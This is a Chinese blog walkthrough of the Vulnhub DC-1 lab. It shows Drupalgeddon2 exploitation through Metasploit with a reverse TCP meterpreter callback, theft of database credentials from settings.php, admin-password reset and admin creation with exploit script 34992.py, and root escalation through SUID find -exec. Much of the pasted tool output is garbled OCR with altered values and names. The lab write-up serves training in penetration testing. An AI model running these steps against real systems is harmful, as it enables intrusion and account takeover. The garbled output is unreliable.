Vulnhub DC-1

靶场链接:

https://www.vulnhub.com/entry/dc-1,292/

 

一、信息收集

1、靶场界面如下:

 

2、使用arp-sacn探测同一区域中的存活主机

sudo arp-scan -l

kali) - s_udg arp-scan -1 Interface: eth@, type: ENIOMB, MAC: Ipv4: 192.168.226.128 Starting arp-scan 1.9.7 With 256 hosts (https://github.com/royhills/arp-scan) 192. 168.226.1 192. 168.226.2 192. 168.226.130 €0: oc. 192.168.226.254 4 packets received by Ending arp-scan 1.9.7: onded co: 00:08 VMwa re , VMwa re , VMwa re , VMwa re , filter, @ packets dropped Inc. Inc. Inc. Inc. by kernel 256 hosts scanned in 1.888 seconds (135.59 hosts/sec) . 1 4 resp

可以锁定192.168.226.130为靶场IP。

 

3、使用nmap进行端口扫描

nmap -sS -v 192.168.226.130

Initiating Parallel DNS resolution Of 1 host. at 16:51 Completed Parallel DNS resolution Of 1 host. at 16:51, 6.20s elapsed Initiating SYN Stealth Scan at 16:51 scanning 192.168.226.130 [1000 ports] Discovered open port Ill/tcp on 192.168.226.130 Discovered open port 80/tcp on 192.168.226.130 Discovered open port 22/tcp on 192.168.226.130 Completed SYN Stealth Scan at 16:51, O.@3s elapsed (1000 total ports) Nmap scan report for 192.168.226.130 Host is up (0.00605€s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Ill/tcp open rpcbind MAC Address: (VMware) Read data files from: /usr/bin/. ./share/nmap Nmap done: 1 IP address (1 host up) scanned in 6.31 Raw packets sent: 1061 (44.028KB) I Rcvd: seconds 1001 (40.040KB)

 

4、发现2280111端口开放,进入到80端口查看网站信息。

可以发现其cms平台为Drupal

Welcome to DrupaISite x + e 192.168.226.130 Kali Linux Kali Tools KaLiDocs X Kali Forums «KaIiNetHunter • Exploit-DB Drupal Site Welcome to Drupal Site No page has been yet.

 

二、漏洞查找与利用

1、使用Metasploit搜索drupal(进入/usr/bin路径下使用./msfconsole),利用msf搜索可用的exp。

> search drupal Matching Modules Disclosure # Name @ exploit/unix/webapp/—_ coder _ exec 2016-07-13 d Execution 1 exploit/unix/webapp/—_ —geddon2 roperty Injection 2 exploit/multi/http/—_ d rupageddon QL Injection ection 4 exploit/unix/webapp/—_ restws_exec Ode Execution 5 exploit/unix/webapp/—_ restws_ unserialize ialize() RCE 6 auxiliary/scanner/http/—_views_user_enum 2010-07-02 Date 2018-03-28 2014-10-15 2012-10-17 2016-07-13 2019-02-20 2005-06-29 7 Rank excellent excellent excellent excellent excellent Check Yes Yes NO Yes Yes Yes Yes Yes Description CODER Module Remote Comman —geddon 2 Forms API P HTTP Pa rameter Key/Value S OpenlD External Entity Inj RESTWS module Remote PHP C RESTful Web Services unser Views Module Users Enumera PHP XML-RPC Arbitrary code Execut tion 7 exploit/unix/webapp/php_xml rpc_eval ion Interact with a module by name or index. For example info use 7 or use exploit/unix/webapp/php xml rpc eval

 

2、选择Rank为excellent并且时间较新的模块,即第1个drupal_drupalgeddon2.

show options   //查看该模块所有可用选项

msf6 > use 1 No payload configured, defaulting to php/meterpreter/ reverse tcp msf6 drupacgeaaonz ) > show options Module options (exploit/unix/webapp/drupal drupatgeddon2): Name DUMP OUTPUT PHP FUNC Proxies RHOSTS RPORT SSL TARGETURI VHOST Current Setting Requi red Description false passthru 80 false yes yes yes yes Dump payload command output PHP function to execute A proxy chain of format host:p The target host(s), see https://github.com/rapid7/m etasploit-f ramework/wiki/Using-Metasploit The target port (TCP) Negotiate SSL/TLS for outgoing connections Path to Drupal install HTTP server virtual host

 

msf6 > usel Unknown command: usel msf6 > use 1 No payload configured, defaulting to php/meterpreter/ reverse tcp msf6 drupalgecldu11L ) > set rhost 192.168.226.130 rhost 192.168.226.130 msf6 drupalgeddon2 ) > set thost 192.168.226.128 lhost 192.168.226.128 msf6 exploit( ) > run

 

三、getshell

1、返回一个shell,使用ls 可以看到flag1.txt

) > run started reverse TCP handler on 192.168.226.128:4444 Running automatic check ("set AutoCheck false" to disable) The service is running, but could not be validated sending stage (39282 bytes) to 192.168.226.130 meterpreter session 1 opened (192.168.226.128:4444 -s ) at 2022-01-11 +0800 shell > shell Process 4170 created. Channel @ created. COPYRIGHT . txt INSTALL. mysql. txt INSTALL. pgsql. txt INSTALL. sqlite. txt INSTALL. txt LICENSE . txt MAINTAINERS . txt README . txt UPGRADE . txt autho rize. php cron. h la 1. txt includes index. php install. php misc modules

2、查看flag1

cat flag1.txt

cat flagl.txt Every good CMS needs a config file - and so do you.

翻译:每个好的CMS都需要一个配置文件,你也一样。

 

根据提示搜索drupal的默认配置文件:sites/default/settings.php

 

3、在配置文件中发现flag2

pwd var/www oami ww-data 

cat /var/www/sites/default/settings.php

* flag2 Brute force and dictionary attacks aren't the only ways to gain access (and you WILL need access) . What can you do with these credentials? $databases = array ( 'default' array ( 'default' array ( ' database ' ' username ' ' password' 'drupaldb' , 'dbuser' , 'ROck3t' , 'localhost', 'host' 'port' ' 'driver' ' prefix ' 'mysql' ,

“Brute force and dictionary attacks aren't the only ways to gain access (and you WILL need access). What can you do with these credentials?”

翻译:暴力破解和字典攻击并非获得访问权限的唯一方式。你可以利用这些凭证做什么?

 

这些凭证即数据库的账号密码:

'username' => 'dbuser'
'password' => 'R0ck3t'

4、使用python反弹一个交互式shell,登陆数据库

python -c 'import pty; pty.spawn("/bin/bash")'
mysql -udbuser -p

python -c 'import Pty; Pty. spawn( "/bin/bash")' www-data@DC-1:/var/www$ mysql -udbuser -p mysql -udbuser -p Enter password: ROck3t

5、查看数据库,在drupaldb库users表中发现admin用户

mysql> show databases; #[drupaldb]
mysql> use drupaldb;
mysql> show tables; #[users]
mysql> select * from users;

mysql> show databases ; show databases; I Database I information_schema I I drupaldb 2 rows in set (0.00 sec) mysql> use drupaldb; use drupaldb; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed

mysql> select select * from I uid I name * from users; users; I pass re_fo rmat I created I access 01 login I mail I status I timezone I language I data I 01 I NULL Il 21 html 01 01 O I NULL I theme I picture I 01 admin I $S$DvQ16Y600iNeXR1eEMF94Y6FvN8nu • JcEDTCP9nS5 . i38jnEKuDR I admin@example.com I us ra la elbourne I Fred I $S$DWGrxef6.DOcwB5Ts .G1nLw15chRRWH2s1R3QBwCOEkvBQ/9TCGg I fred@example.org | 1550581952 | 1550582225 | 1550582225 | 1 | Australia/Melbourne I signature I signatu init I NULL I NULL admin@example.com I filtere f red@example.org d 3 rows in set (0.01 sec)

admin用户的密码被加密了,可以想办法破解密码或者修改密码或者新增一个admin权限的用户。

 

查看Drupal版本,确定Drupal版本为7.24

www-data@DC-1:/var/www$ cat I cat /var/www/includes/bootstrap.inc I grep VERSION define( 'VERSION' , '7.24'); $has openssl — - version compare(PHP VERSION, grep VERSION 5 3 4' function exists('openssl random pseudo bytes');

 

方法一:修改admin用户的密码

在Drupal 7的安装目录中的scripts目录下,有一些Drupal 7开发者准备好的PHP脚本,可以执行一些高级操作。其中有一个脚本名为:password-hash.sh,它的功能是传入一个密码(字符串),即返回加密后的密码字符串

参考:

https://blog.csdn.net/xieyanxy9/article/details/84118604

 

所以使用Drupal对数据库的加密方法,生成一个新密码,把新密码更新到admin用户即可。

www-data@DC-1:/var/www$ php scripts/password-hash.sh kin php scripts/password-hash.sh kin password: kin hash: $S$D48yxVyxkkkLwhf .80yRIAYgSJVx3DxtECZxJbhCzvQfGpE30Kb/ www-data@DC-1:/var/www$ mysql -udbuser -p mysql -udbuser -p Enter password: ROck3t 

hash: $S$D48yxVyxkkkLwhf.8OyR1AYgSJVx3DxtECZxJbhCzvQfGpE30Kb/

mysql> update drupaldb.users set where name:" admin" <Lwhf.80yRIAYgSJVx3DxtECZxJbhCzvQfGpE3@Kb/" where name:" admin" ; Query OK, 1 row affected sec) Rows matched: 1 Changed: 1 Warnings: @

 

方法二:新增一个admin用户

利用漏洞库中给出的exp新增一个admin用户。

msf > searchsploit drupal

msf6 > searchsploit drupal 4.7 4.x 5.2 7.31 7.31 7.31 7.31 7.31 exec : Exploit searchsploit drupal Title - News Message HTML Injection - Cross-Site Scripting < 4.6. 1 - Comments PHP Injection 'Attachment mod mime' Remote Command - URL-Encoded Input HTML Injection - PHP Zend Hash ation Vector Drupal Drupal 4. 7. 7. 7. 7. 7. 4.1/4.2 4.5.3 - Denial of Service 5.21/6.16 6.15 Multi le Persistent Cross-site Scri eddon' geddon geddon ' geddon ' geddon' SQL SQL SQL SQL SOL In •ection Injection Injection Injection Injection Execution tin Vulner (Add Admin U (Admin Sessi I (POC) (Reset I (POC) (Reset I (Remote Code I Path php/webapps/21863. txt php/webapps/22940. txt php/webapps/1088. pl php/webapps/1821. php php/webapps/27@20. txt php/webapps/4510. txt php/dos/10826. sh h /weba s/11@6@.txt h /weba s/34992. php/webapps/44355. php php/webapps/34984. py php/webapps/34993. php php/webapps/3515@.php

 

先复制漏洞库中给出的exp脚本,将复制出来的脚本粘贴到根目录下

cp /usr/share/exploitdb/exploits/php/webapps/34992.py ./

cp L /home/kinyoobi I /usr/sha re/exploitdb/exploits/php/webapps/34992. 

cat 34992.py #查看语法

commandList = optparse.OptionParser( 'usage: %prog -t http[s] ://TARGET URL commandList.add option( '--target' , action:" sto re" , help="lnsert URL: http[s] ://www.victim. com" , commandList.add option( ' -u', '--username' , action=" sto re" , username" , commandList.add option( ' -p', ' action:" sto re" , help:" Insert password" , -u USER -p PASS\n') 

python 34992.py -t http://192.168.226.130 -u kin -p kin

python -p /home/kinyoobi) 34992. http://192. 168 . 226. 130 kin kin

 VULNERABLE ! Administrator user created! Login: kin Pass: kin Uri: http://192.168.226.130/?q=node&destination=node

 

使用admin/kin 或者kin/kin成功登录后,点击find content,即可找到flag3。

admin My out Drupal Site flag3 PERMS will help FIND passwd . but you'll 'Wed that command work out in

“Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.”

 

根据flag3提示可以知道有/etc/passwd/etc/shadow

  • /etc/passwd 是系统用户配置文件,存储了系统中所有用户的基本信息,并且所有用户都可以对此文件执行读操作。它包含系统帐户的列表,为每个帐户提供一些有用的信息,如用户 ID、组 ID、主目录、shell 等。
  • /etc/shadow 文件,用于存储 Linux 系统中用户的密码信息,又称为“影子文件”。
  • /etc/passwd 文件允许所有用户读取,易导致用户密码泄露,因此 Linux 系统将用户的密码信息从 /etc/passwd 文件中分离出来,并单独放到了/etc/shadow中。
  • /etc/shadow 文件只有 root 用户拥有读权限,其他用户没有任何权限,这样就保证了用户密码的安全性。

permsfind-exec是提权用的。

查看/etc/passwd,找到flag4。

www-data@DC-1:/var/www$ cd /home/flag4 cd /home/flag4 www-data@DC-1:/home/flag4$ Is flag4. txt www-data@DC-1:/home/flag4$ cat flag4. txt cat flag4. txt Can you use this same method to find or access the flag in root? Probably. But perhaps it's not that easy. Or maybe it is? 

cd /home/flag4
cat flag4.txt

www-data@DC-1:/var/www$ cd /home/flag4 cd /home/flag4 www-data@DC-1:/home/flag4$ Is flag4. txt www-data@DC-1:/home/flag4$ cat flag4. txt cat flag4. txt Can you use this same method to find or access the flag in root? Probably. But perhaps it's not that easy. Or maybe it is?

“Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy. Or maybe it is?”

 

尝试查看一下/etc/shadow,没有权限。

www-data@DC-1:/home/fIag4$ cat /etc/shadow cat /etc/shadow cat: /etc/shadow: Permission denied

四、find提权&suid提权

1、find提权的前提条件是:目标用户下 /usr/bin/find 要有suid权限,sudi权限具有和root用户一样的权限能力。

$ find / -perm -u=s -type f 2>/dev/null  #查找具有root权限的SUID的文件

 www-data@DC-1:/home/f1ag4$ find / -perm find / -perm -Uzs -type f 2>/dev/null /bin/mount /bin/ping /bin/su /bin/ping6 /bin/umount /usr/bin/at /usr/bin/chsh /usr/bin/passwd /us r/bin/newgrp /usr/bin/chfn /usr/bin/gpasswd /usr/bin/ rocmail usr/bin/find usr s In exlm /usr/lib/pt chown /us r/lib/openssh/ssh-keysign /us r/l ib/ej ect/dmc rypt -get -device -u=s -type f 2>/dev/null /us r/lib/dbus-l. O/dbus-daemon - launch - helper /sbin/mount . nfs

可以看到find命令具有SUID权限,如果find以SUID权限运行,所有通过find执行的命令都会以root权限运行。

2、使用find命令提权

find ./ aaa -exec '/bin/sh' \;
# find 命令找到 ./ 下 aaa文件,如果没有,执行 -exec '/bin/sh' \;
# -exec 参数后面跟的是command命令,它的终止是以;为结束标志的,所以这句命令后面的分号是不可缺少的
# 考虑到各个系统中分号会有不同的意义,所以在分号前面加反斜杠

www-data@DC-1:/home/flag4$ find find . / aaa -exec '/bin/sh' \ ; # whoami whoami root # cd /root cd / root Is thefinalflag . txt # cat thefinatflag.txt cat thefinalflag.txt Well done! - exec ' /bin/sh' N; Hopefully you 've enjoyed this and learned some new skills. You can let me know what you thought of this little journey by contacting me via Twitter - @DCAU7

获取第5个最终flag,成功走完了整个渗透流程。

 

 
 
posted @ 2022-01-17 16:03  kinyoobi  阅读(142)  评论(0)    收藏  举报